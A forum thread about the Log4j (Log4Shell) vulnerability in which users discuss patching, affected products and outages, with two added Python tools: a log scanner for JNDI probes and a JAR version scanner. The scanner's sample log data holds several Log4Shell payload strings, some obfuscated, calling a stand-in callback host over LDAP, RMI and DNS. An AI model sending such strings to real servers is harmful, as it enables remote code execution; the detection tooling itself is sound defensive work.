SIGforum
Log4j -- The Internet is on fire. HUGE global security vulnerability.
December 14, 2021, 06:17 AM
r0gue
Just Google Log4j. There's no end to the articles already, and it will just continue.
Cliff Notes: Many/Most/All(?) software vendors use bits of old code when they build new code. Some use a lot. Many use open source (unlicensed and free to use) software called Java under the hood of their commercial software. A new vulnerability allows remote bad actors to take over any system with this flaw with trivial ease. This vulnerability is thought to be present in HUNDREDS OF MILLIONS of systems world-wide.
Software re-use. They built castles on a free foundation, which we now learn is terribly flawed. It’s used in damn near everything. From global top tier software, to refrigerators. And this (ubiquitous use of Java) was NOT unknown. We’ve been talking about this for years. The industry I mean, not just me or my team.
It was in my home Ubiquiti router. I had to do an upgrade yesterday. And I'm still not sure someone didn't plant something for future access. We're patching multiple internal systems at work. Luckily none exposed to the Internet.
-- Some quotes from articles this morning:
“If you have an internet-facing server vulnerable to Log4Shell that you haven't patched yet, you almost certainly have an incident response on your hands,” says incident responder and former NSA hacker Jake Williams. “Threat actors were quick to operationalize this vulnerability."
“In a best-case scenario, major brokerages, banks, and merchants will invest huge sums in overtime costs to pay large numbers of already overworked IT employees to mop up this mess during the holidays. You don’t want to think about the worst-case scenario.”
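Jake Williams's point above is that an unpatched Internet-facing box has to be treated as an incident, and the first thing a responder does with such a box is go through its web access logs for the lookup string the exploit depends on. The following is an added example, not code from the original post or from the Apache project: a Python triage script that URL-decodes each line, collapses the ${lower:...}, ${upper:...} and ${name:-default} nesting attackers used to hide the word "jndi" from naive greps, and pulls out the protocol and callback host of every JNDI lookup it finds. The log lines and the 198.51.100.9 callback address are constructed sample data.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Constructed sample access-log lines (not taken from the thread): one benign
# request, a plain probe, two lookup-obfuscated probes and a URL-encoded one.
# 198.51.100.9 stands in for the attacker's callback server.
SAMPLE_LOGS = [
    '203.0.113.5 - - [10/Dec/2021:22:14:03 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2021:22:14:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.9:1389/a}"',
    '203.0.113.8 - - [10/Dec/2021:22:15:41 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:rmi}://198.51.100.9:1099/a}"',
    '203.0.113.9 - - [10/Dec/2021:22:16:02 +0000] "GET /?x=${${::-j}${::-n}${::-d}${::-i}:dns://198.51.100.9/a} HTTP/1.1" 400 0 "-" "curl/7.68.0"',
    '203.0.113.10 - - [10/Dec/2021:22:17:30 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.9%2Fa%7D HTTP/1.1" 200 512 "-" "python-requests/2.26.0"',
]

# An innermost ${...}: its body contains no further "${" and no "}".
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup after normalisation: capture the protocol and the callback host.
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^/:}\s]+)", re.IGNORECASE)


def _resolve(body: str) -> Optional[str]:
    """Evaluate one lookup the way Log4j's substitutor would, for the lookups
    attackers used to hide the word "jndi". None means leave it in place
    (the jndi lookup itself, or anything we cannot evaluate offline)."""
    key = body.lower()
    if key.startswith("lower:"):
        return body[6:].lower()
    if key.startswith("upper:"):
        return body[6:].upper()
    if ":-" in body:
        # ${name:-default}: an unresolvable name ("${::-j}", an unset
        # "${env:X:-j}") yields the default text.
        return body.split(":-", 1)[1]
    return None


def normalize_lookups(s: str, max_passes: int = 32) -> str:
    """Collapse nested lookups inside-out until nothing more can be evaluated."""
    for _ in range(max_passes):
        changed = False

        def sub(m):
            nonlocal changed
            val = _resolve(m.group(1))
            if val is None:
                return m.group(0)
            changed = True
            return val

        s = INNERMOST.sub(sub, s)
        if not changed:
            break
    return s


def jndi_targets(line: str) -> List[Tuple[str, str]]:
    """(protocol, callback host) for every JNDI lookup in a log line, after
    URL-decoding and de-obfuscation. An empty list means the line is clean."""
    norm = normalize_lookups(unquote(line))
    return [(scheme.lower(), host) for scheme, host in JNDI.findall(norm)]


def is_log4shell_probe(line: str) -> bool:
    return bool(jndi_targets(line))


def scan(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Triage a batch of lines; returns (line number, protocol, callback host)."""
    return [(n, scheme, host)
            for n, line in enumerate(lines, 1)
            for scheme, host in jndi_targets(line)]


if __name__ == "__main__":
    for n, scheme, host in scan(SAMPLE_LOGS):
        print(f"line {n}: JNDI lookup over {scheme} to {host}")
```

The callback hosts are what to take to the egress firewall and DNS logs next: a probe followed by an outbound LDAP, RMI or DNS connection from the server to that host is a successful exploitation, not just a scan. The normalizer covers the lookup tricks seen in the first days of exploitation; any line that still contains an unresolved ${...} after normalization deserves a manual look rather than a pass.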
December 14, 2021, 06:21 AM
rsbolo
Oh joy.
Thanks for the heads up.
____________________________
Yes, Para does appreciate humor.
December 14, 2021, 06:26 AM
r0gue
Watch out for kids' software on your home computers/hardware. A lot of games use this stuff. Minecraft for example. If they log into web services with any Java based games, it's a big risk until this is patched up. Including the game, on your hardware.
It's under the covers on damn near everything. This is gonna leave a mark I'm afraid.

December 14, 2021, 06:29 AM
Bassamatic
Yeah, I think we have known this since Al Gore invented the internet. The more of your personal data that you put out there, the more vulnerable you become. Buyer beware.
.....never marry a woman who is mean to your waitress.
December 14, 2021, 06:36 AM
PGT
For the non-technical, a picture is worth 1000 words.
December 14, 2021, 06:40 AM
erj_pilot
Source article link?? Thank you…
"If you’re a leader, you lead the way. Not just on the easy ones; you take the tough ones too…” – MAJ Richard D. Winters (1918-2011), E Company, 2nd Battalion, 506th Parachute Infantry Regiment, 101st Airborne
"Woe to those who call evil good, and good evil... Therefore, as tongues of fire lick up straw and as dry grass sinks down in the flames, so their roots will decay and their flowers blow away like dust; for they have rejected the law of the Lord Almighty and spurned the word of the Holy One of Israel." - Isaiah 5:20,24
December 14, 2021, 07:24 AM
SPWAMike0317
Here is a breakdown.
https://www.zdnet.com/article/...to-protect-yourself/
"A flaw in Log4j, a Java library for logging error messages in applications, is the most high-profile security vulnerability on the internet right now and comes with a severity score of 10 out of 10. The library is developed by the open-source Apache Software Foundation and is a key Java-logging framework."
FWIW, logging errors in applications is critical. Apache is widely deployed so log4j is out there.
The question for all CEOs: Can your CIO/CSO provide a detailed inventory of applications that use the vulnerable versions of log4j? Now, can that inventory be provided within an hour of your request? If not, your DevOps program is out of control and you are vulnerable.
I worked over 40 years in IT Infrastructure. My last two years involved many conversations with "DevOps" folks on the need for version control, change control and security measures. My take? There are some organizations that will be hit hard because they didn't implement a secure DevOps program.
It's not TEOTWAWKI but it will be career ending for some CIO/CSO. Any CIO/CSO that cannot produce that inventory within 1 hour of request has failed and should be called to task.
Let me help you out. Which way did you come in?
December 14, 2021, 07:26 AM
Graniteguy
Glad I have an older refrigerator.
December 14, 2021, 07:32 AM
Chris17404
Yep. Dealing with this at work.
December 14, 2021, 08:02 AM
ridewv
As long as it doesn't crash my wood stove or well pump I'll be alright.
No car is as much fun to drive, as any motorcycle is to ride.
December 14, 2021, 08:05 AM
Orguss
Oh noes! A security flaw with Java?! Say it ain't so!
When hasn't there been an issue with Java?
"I'm yet another resource-consuming kid in an overpopulated planet raised to an alarming extent by Hollywood and Madison Avenue, poised with my cynical and alienated peers to take over the world when you're old and weak!" - Calvin, "Calvin & Hobbes"
December 14, 2021, 09:22 AM
DoctorSolo
quote:
Originally posted by Orguss:
Oh noes! A security flaw with Java?! Say it ain't so!
When hasn't there been an issue with Java?
Seriously.
December 14, 2021, 10:10 AM
OKCGene
I know nothing about this, but I just want to ask, is Apple more secure, more resistant, whatever, to this stuff? Seems like I never hear about Apple getting a virus or malware?
Thanks
December 14, 2021, 10:21 AM
ensigmatic
quote:
Originally posted by r0gue:
It was in my home Ubiquiti router.
In the router, or in the Ubiquiti UniFi Network framework? Near as I've been able to tell, only in the latter. E.g.: My Ubiquiti ERL is not vulnerable.
quote:
Originally posted by SPWAMike0317:
"A flaw in Log4j, a Java library for logging error messages in applications, is the most high-profile security vulnerability on the internet right now and comes with a severity score of 10 out of 10. The library is developed by the open-source Apache Software Foundation and is a key Java-logging framework."
FWIW, logging errors in applications is critical. Apache is widely deployed so log4J is out there.
Yes, Apache is widely-deployed, but, as noted in the cited article, log4j will be present only if there's a Java framework.
I've Apache deployed on three Internet-facing servers. None have any Java frameworks installed. Thus none are vulnerable.
For anybody interested: Here's a list of known vulnerable and known not vulnerable products and applications:
Log4j overview related software
None of my Internet-facing devices or services are vulnerable. If I have any IoT devices vulnerable I'm not overly concerned, as I don't allow arbitrary connections from the Internet to devices on my internal LAN.
"America is at that awkward stage. It's too late to work within the system... but too early to shoot the bastards." -- Claire Wolfe
"If we let things terrify us, life will not be worth living." -- Seneca the Younger, Roman Stoic philosopher
December 14, 2021, 11:16 AM
RogueJSK
quote:
Originally posted by ensigmatic:
For anybody interested: Here's a list of known vulnerable and known not vulnerable products and applications:
Log4j overview related software
Oh, joy. Our entire state's court record database system is built around one of the vulnerable applications.
I'm sure the state IT guys are running around with their hair on fire right now.
December 14, 2021, 11:39 AM
BamaJeepster
quote:
Originally posted by RogueJSK:
quote:
Originally posted by ensigmatic:
For anybody interested: Here's a list of known vulnerable and known not vulnerable products and applications:
Log4j overview related software
Oh, joy. Our entire state's court record database system is built around one of the vulnerable applications.
I'm sure the state IT guys are running around with their hair on fire right now.
The Virginia legislative system has been down since Monday.
https://wset.com/news/local/vi...re-ransomware-attack
One of our vendors reported they were down on Monday as well. Luckily we don't use them for this, but they have a lot of companies that do use them for HR and Payroll. All down, and their best estimate is several weeks. Imagine your timeclock, HR and payroll being down from now thru the end of the year.
https://www.usatoday.com/story...ack-2021/6501274001/
“Facts are stubborn things; and whatever may be our wishes, our inclinations, or the dictates of our passions, they cannot alter the state of facts and evidence.”
- John Adams
December 14, 2021, 11:45 AM
tanner
quote:
Originally posted by RogueJSK:
quote:
Originally posted by ensigmatic:
For anybody interested: Here's a list of known vulnerable and known not vulnerable products and applications:
Log4j overview related software
Oh, joy. Our entire state's court record database system is built around one of the vulnerable applications.
I'm sure the state IT guys are running around with their hair on fire right now.
Likely, the state does not run its own servers or networks. It’ll all be farmed out to the lowest bidder vendors. IBM, VMWARE, Oracle, F5, etc. etc. Moreover, it’ll be a combination of all of these vendors, not just one overall. It’ll be a CRITSIT shitshow for sure.
The saving grace is that the hackers are probably not very interested in court records but in the more high-value targets like Vanguard, Fidelity, banks.
Makes me wonder how much of the bitcoin stuff has this vulnerability baked into it. Stay tuned I suppose.
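The inventory question SPWAMike0317 raised earlier and the vendor sprawl described in the post above come down to the same mechanical check: which archives on a host actually carry log4j-core, at what version, and whether the JndiLookup class is still inside them. Below is an added example written for this page, not code from any of the vendors named or from the Apache project: a Python scanner that walks a directory tree, opens JARs, WARs and EARs (recursing into archives nested inside them), reads the Maven pom.properties that log4j-core ships with, falls back to the conventional file name, and grades each hit against the fix levels Apache published (2.15.0 for CVE-2021-44228, 2.16.0 for the follow-up CVE-2021-45046, with the 2.12.x and 2.3.x backport branches handled separately). The directory layout, file names and versions in build_fixture are constructed test data; the class file entries hold only the four-byte class magic.

```python
import io
import re
import tempfile
import zipfile
from pathlib import Path
from typing import Iterator, List, Optional, Tuple

POM = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVES = (".jar", ".war", ".ear", ".zip")
NAME_VERSION = re.compile(r"log4j-core-(\d[\w.-]*?)\.jar$")
Finding = Tuple[str, str, bool, str]  # (location, version, JndiLookup present, status)

def parse_version(v: str) -> Optional[Tuple[int, int, int]]:
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", v)
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)) if m else None

def classify(version: str, jndi_present: bool) -> str:
    """Grade a log4j-core version against the published Apache fix levels:
    2.15.0 closed CVE-2021-44228 (2.12.2 on the Java 7 branch, 2.3.1 on the Java 6
    branch), 2.16.0 closed CVE-2021-45046; a deleted JndiLookup.class was the stop-gap."""
    parsed = parse_version(version)
    if parsed is None:
        return "unparseable version; inspect manually"
    major, minor, patch = parsed
    if major != 2:
        return "not log4j 2.x; outside Log4Shell scope"
    if (minor, patch) >= (16, 0) or (minor == 12 and patch >= 2) or (minor == 3 and patch >= 1):
        return "patched"
    if (minor, patch) == (15, 0):
        return "partial: CVE-2021-44228 closed, CVE-2021-45046 still open; upgrade"
    if not jndi_present:
        return "vulnerable version, but JndiLookup.class removed (mitigated)"
    return "VULNERABLE to CVE-2021-44228; upgrade or remove JndiLookup.class"

def _scan_archive(zf: zipfile.ZipFile, where: str) -> Iterator[Tuple[str, Optional[str], bool]]:
    """Yield (location, version, JndiLookup present) for this archive and every archive
    nested in it: WARs carry WEB-INF/lib, EARs carry WARs, shaded fat JARs copy the classes."""
    names = set(zf.namelist())
    jndi_present = JNDI_CLASS in names
    version: Optional[str] = None
    if POM in names:  # Maven metadata log4j-core ships with; survives shading by default
        for line in zf.read(POM).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                version = line.split("=", 1)[1].strip()
    if version is None:  # fall back to the conventional file name
        m = NAME_VERSION.search(where)
        version = m.group(1) if m else None
    if version is not None or jndi_present:
        yield where, version, jndi_present
    for name in sorted(names):
        if name.lower().endswith(ARCHIVES):
            try:
                inner = zipfile.ZipFile(io.BytesIO(zf.read(name)))
            except (zipfile.BadZipFile, KeyError):
                continue
            yield from _scan_archive(inner, f"{where}!{name}")

def scan_tree(root: Path) -> List[Finding]:
    findings: List[Finding] = []
    for path in sorted(p for p in root.rglob("*") if p.is_file() and p.suffix.lower() in ARCHIVES):
        try:
            zf = zipfile.ZipFile(path)
        except zipfile.BadZipFile:
            continue
        for where, version, jndi in _scan_archive(zf, path.relative_to(root).as_posix()):
            status = classify(version, jndi) if version else "log4j-core classes present, version unknown"
            findings.append((where, version or "unknown", jndi, status))
    return findings

def build_fixture(root: Path) -> None:
    """Constructed test tree, not real vendor software: an unpatched library JAR, a WAR
    bundling a patched nested JAR, and a fat JAR whose JndiLookup.class was stripped."""
    def pom(v: str) -> str:
        return f"version={v}\ngroupId=org.apache.logging.log4j\nartifactId=log4j-core\n"
    (root / "app" / "lib").mkdir(parents=True)
    with zipfile.ZipFile(root / "app" / "lib" / "log4j-core-2.14.1.jar", "w") as z:
        z.writestr(POM, pom("2.14.1"))
        z.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic stands in for the class
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as z:
        z.writestr(POM, pom("2.17.1"))
        z.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")
    with zipfile.ZipFile(root / "app" / "portal.war", "w") as z:
        z.writestr("WEB-INF/lib/log4j-core-2.17.1.jar", inner.getvalue())
    with zipfile.ZipFile(root / "app" / "service.jar", "w") as z:
        z.writestr(POM, pom("2.14.1"))  # no JndiLookup.class: deleted from the JAR

def demo() -> List[Finding]:
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_fixture(root)
        return scan_tree(root)

if __name__ == "__main__":
    for where, version, jndi, status in demo():
        print(f"{where}: log4j-core {version}, JndiLookup {'present' if jndi else 'absent'} -> {status}")
```

Point scan_tree at an application's install directory rather than the fixture to use it for real. Two limits worth knowing: a JAR that was repackaged without its Maven metadata and renamed reports "version unknown" even though the JndiLookup class gives it away, and a log4j-core loaded from outside the scanned tree (a shared application-server lib directory, a container layer) is only found if that path is scanned too. Neither of those is a reason to trust a vendor statement over looking at the host.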
December 14, 2021, 12:07 PM
mark123
quote:
Originally posted by Orguss:
Oh noes! A security flaw with Java?! Say it ain't so!
When hasn't there been an issue with Java?
Yeah. It needs to be scrapped. If it’s needed with no alternative, it needs to be run on a VM that’s locked down with no external access.
December 14, 2021, 12:23 PM
sigcrazy7
You're hating it if you work for Cisco. Those folks must be in full-on crisis mode.
I don't see Apple, MSFT other than Azure, and Synology on the list. I should be GTG. I'm not running any Dockers at the moment, so no worries there.
Demand not that events should happen as you wish; but wish them to happen as they do happen, and you will go on well. -Epictetus
December 14, 2021, 12:53 PM
sigmonkey
Checked the list.
sigmonkey 1.0 retired not vulnerable
"the meaning of life, is to give life meaning" ✡ Ani Yehudi אני יהודי Le'olam lo shuv לעולם לא שוב!